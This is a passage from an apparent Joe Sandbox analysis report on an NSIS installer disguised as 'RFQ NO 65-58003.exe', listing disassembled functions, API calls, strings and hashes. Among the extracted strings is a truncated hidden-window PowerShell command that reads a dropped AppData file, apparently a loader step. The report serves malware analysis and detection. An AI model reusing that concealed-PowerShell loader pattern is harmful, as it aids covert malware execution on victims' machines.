                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ NO 65-58003.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-1611239955
                                                              • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                              • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
                                                              • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                              • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D
                                                              Function 00406234 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 430 406234-40623f 431 406241-406250 430->431 432 406252-406268 430->432 431->432 433 406480-406486 432->433 434 40626e-40627b 432->434 436 40648c-406497 433->436 437 40628d-40629a 433->437 434->433 435 406281-406288 434->435 435->433 438 4064a2-4064a3 436->438 439 406499-40649d call 406212 436->439 437->436 440 4062a0-4062ac 437->440 439->438 442 4062b2-4062ee 440->442 443 40646d 440->443 444 4062f4-4062ff GetVersion 442->444 445 40640e-406412 442->445 446 40647b-40647e 443->446 447 40646f-406479 443->447 448 406301-406305 444->448 449 406319 444->449 450 406414-406418 445->450 451 406447-40644b 445->451 446->433 447->433 448->449 457 406307-40630b 448->457 454 406320-406327 449->454 452 406428-406435 call 406212 450->452 453 40641a-406426 call 406159 450->453 455 40645a-40646b lstrlenW 451->455 456 40644d-406455 call 406234 451->456 468 40643a-406443 452->468 453->468 459 406329-40632b 454->459 460 40632c-40632e 454->460 455->433 456->455 457->449 463 40630d-406311 457->463 459->460 466 406330-406356 call 4060df 460->466 467 40636a-40636d 460->467 463->449 464 406313-406317 463->464 464->454 478 4063f5-4063f9 466->478 479 40635c-406365 call 406234 466->479 471 40637d-406380 467->471 472 40636f-40637b GetSystemDirectoryW 467->472 468->455 470 406445 468->470 474 406406-40640c call 4064a6 470->474 476 406382-406390 GetWindowsDirectoryW 471->476 477 4063eb-4063ed 471->477 475 4063ef-4063f3 472->475 474->455 475->474 475->478 476->477 477->475 480 406392-40639c 477->480 478->474 485 4063fb-406401 lstrcatW 478->485 479->475 482 4063b6-4063cc SHGetSpecialFolderLocation 480->482 483 40639e-4063a1 480->483 488 4063e7 482->488 489 4063ce-4063e5 SHGetPathFromIDListW CoTaskMemFree 482->489 483->482 487 4063a3-4063aa 483->487 485->474 491 4063b2-4063b4 487->491 488->477 489->475 489->488 491->475 491->482
                                                              APIs
                                                              • GetVersion.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,?,004053A8,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004062F7
                                                              • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 00406375
                                                              • GetWindowsDirectoryW.KERNEL32(004281E0,00000400), ref: 00406388
                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
                                                              • SHGetPathFromIDListW.SHELL32(?,004281E0), ref: 004063D2
                                                              • CoTaskMemFree.OLE32(?), ref: 004063DD
                                                              • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
                                                              • lstrlenW.KERNEL32(004281E0,00000000,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,?,004053A8,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 0040645B
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406343
                                                              • powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas, xrefs: 0040642E
                                                              • C:\Users\user\AppData\Local\Temp\nsm1096.tmp\, xrefs: 00406259
                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004063FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsm1096.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas
                                                              • API String ID: 900638850-3053705125
                                                              • Opcode ID: a900ca9bf6153fc6656b4f670c8f5ecdb0e059a5c91e72301d0c84f9da171f8e
                                                              • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
                                                              • Opcode Fuzzy Hash: a900ca9bf6153fc6656b4f670c8f5ecdb0e059a5c91e72301d0c84f9da171f8e
                                                              • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D
                                                              Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 556 40176f-401794 call 402c53 call 405c3d 561 401796-40179c call 406212 556->561 562 40179e-4017b0 call 406212 call 405bc6 lstrcatW 556->562 567 4017b5-4017b6 call 4064a6 561->567 562->567 571 4017bb-4017bf 567->571 572 4017c1-4017cb call 406555 571->572 573 4017f2-4017f5 571->573 580 4017dd-4017ef 572->580 581 4017cd-4017db CompareFileTime 572->581 574 4017f7-4017f8 call 405dc2 573->574 575 4017fd-401819 call 405de7 573->575 574->575 583 40181b-40181e 575->583 584 40188d-4018b6 call 405371 call 40317b 575->584 580->573 581->580 585 401820-40185e call 406212 * 2 call 406234 call 406212 call 405957 583->585 586 40186f-401879 call 405371 583->586 596 4018b8-4018bc 584->596 597 4018be-4018ca SetFileTime 584->597 585->571 618 401864-401865 585->618 598 401882-401888 586->598 596->597 600 4018d0-4018db CloseHandle 596->600 597->600 601 402ae4 598->601 605 4018e1-4018e4 600->605 606 402adb-402ade 600->606 604 402ae6-402aea 601->604 608 4018e6-4018f7 call 406234 lstrcatW 605->608 609 4018f9-4018fc call 406234 605->609 606->601 615 401901-4022fc call 405957 608->615 609->615 615->604 615->606 618->598 620 401867-401868 618->620 620->586
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\afdragsordning\Overrack2,?,?,00000031), ref: 004017B0
                                                              • CompareFileTime.KERNEL32(-00000014,?,%TMP%,%TMP%,00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\afdragsordning\Overrack2,?,?,00000031), ref: 004017D5
                                                                • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004053CC
                                                                • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\), ref: 004053DE
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: %TMP%$C:\Users\user\AppData\Roaming\afdragsordning\Overrack2$loyolism
                                                              • API String ID: 1941528284-1691582717
                                                              • Opcode ID: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
                                                              • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
                                                              • Opcode Fuzzy Hash: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
                                                              • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E
                                                              Function 00405371 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 622 405371-405386 623 40538c-40539d 622->623 624 40543d-405441 622->624 625 4053a8-4053b4 lstrlenW 623->625 626 40539f-4053a3 call 406234 623->626 628 4053d1-4053d5 625->628 629 4053b6-4053c6 lstrlenW 625->629 626->625 631 4053e4-4053e8 628->631 632 4053d7-4053de SetWindowTextW 628->632 629->624 630 4053c8-4053cc lstrcatW 629->630 630->628 633 4053ea-40542c SendMessageW * 3 631->633 634 40542e-405430 631->634 632->631 633->634 634->624 635 405432-405435 634->635 635->624
                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                              • lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004053CC
                                                              • SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\), ref: 004053DE
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsm1096.tmp\
                                                              • API String ID: 2531174081-197708713
                                                              • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                              • Instruction ID: a3987805c55db6f4a015f8fdfae83c311b34e51693a8fcc51f5c24f156ed4de6
                                                              • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                              • Instruction Fuzzy Hash: A3218C71900518BBCB119F95ED84ACFBFB8EF45350F50807AF904B62A0C3B98A91DF68
                                                              Function 00405840 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 636 405840-40588b CreateDirectoryW 637 405891-40589e GetLastError 636->637 638 40588d-40588f 636->638 639 4058b8-4058ba 637->639 640 4058a0-4058b4 SetFileSecurityW 637->640 638->639 640->638 641 4058b6 GetLastError 640->641 641->639
                                                              APIs
                                                              • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405883
                                                              • GetLastError.KERNEL32 ref: 00405897
                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004058AC
                                                              • GetLastError.KERNEL32 ref: 004058B6
                                                              Strings
                                                              • C:\Users\user\Desktop, xrefs: 00405840
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405866
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                              • API String ID: 3449924974-1229045261
                                                              • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                              • Instruction ID: cbd092c4ebd5e7b47652c6b2ce971f8280a433404df7830fbb595f789125ae90
                                                              • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                              • Instruction Fuzzy Hash: 43011A72D00619DAEF10EFA0C9447EFBBB8EF04344F00803AD944B6280E7789614CF99
                                                              Function 0040657C Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 642 40657c-40659c GetSystemDirectoryW 643 4065a0-4065a2 642->643 644 40659e 642->644 645 4065b3-4065b5 643->645 646 4065a4-4065ad 643->646 644->643 648 4065b6-4065e9 wsprintfW LoadLibraryExW 645->648 646->645 647 4065af-4065b1 646->647 647->648
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                              • wsprintfW.USER32 ref: 004065CE
                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004065E2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                              • String ID: %s%S.dll$UXTHEME$\
                                                              • API String ID: 2200240437-1946221925
                                                              • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                              • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
                                                              • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                              • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8
                                                              Function 00405E16 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 649 405e16-405e22 650 405e23-405e57 GetTickCount GetTempFileNameW 649->650 651 405e66-405e68 650->651 652 405e59-405e5b 650->652 653 405e60-405e63 651->653 652->650 654 405e5d 652->654 654->653
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00405E34
                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00403448,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403672), ref: 00405E4F
                                                              Strings
                                                              • "C:\Users\user\Desktop\RFQ NO 65-58003.exe", xrefs: 00405E16
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E1B
                                                              • nsa, xrefs: 00405E23
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-3913368906
                                                              • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                              • Instruction ID: 4cf6052b0ced346fb1ee4b1f894cf66bb827df7868a0d4c9989a51242fd2e3ec
                                                              • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                              • Instruction Fuzzy Hash: 9BF09076700608FBDB008F59DD05A9BBBBDEB95750F10403AFD40F7180E6B09A548B64
                                                              Function 00405CCE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 655 405cce-405ce9 call 406212 call 405c71 660 405ceb-405ced 655->660 661 405cef-405cfc call 4064a6 655->661 662 405d47-405d49 660->662 665 405d0c-405d10 661->665 666 405cfe-405d04 661->666 667 405d26-405d2f lstrlenW 665->667 666->660 668 405d06-405d0a 666->668 669 405d31-405d45 call 405bc6 GetFileAttributesW 667->669 670 405d12-405d19 call 406555 667->670 668->660 668->665 669->662 675 405d20-405d21 call 405c12 670->675 676 405d1b-405d1e 670->676 675->667 676->660 676->675
                                                              APIs
                                                                • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                                • Part of subcall function 00405C71: CharNextW.USER32(?,?,00425F30,?,00405CE5,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0,00000000), ref: 00405C7F
                                                                • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C84
                                                                • Part of subcall function 00405C71: CharNextW.USER32(00000000), ref: 00405C9C
                                                              • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0,00000000), ref: 00405D27
                                                              • GetFileAttributesW.KERNELBASE(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30, 4#v.#v,?,76232EE0,00405A23,?,76233420,76232EE0), ref: 00405D37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                              • String ID: 4#v.#v$0_B
                                                              • API String ID: 3248276644-2013401392
                                                              • Opcode ID: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                              • Instruction ID: ff48dfae10af5decf38b12d619470e329e8f167eeffaec785d8039fb28d6ac4e
                                                              • Opcode Fuzzy Hash: 8c509004bd2409bcc8bce800ca11afa93321ed7f3e6ee2afcf27be4b7ee26805
                                                              • Instruction Fuzzy Hash: 6DF04439108F612AE622323A2D08ABF1A14CF8236474A423FF851B12D1CB3C8D43DC6E
                                                              Function 004023EA Relevance: 6.1, APIs: 4, Instructions: 73registrystringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
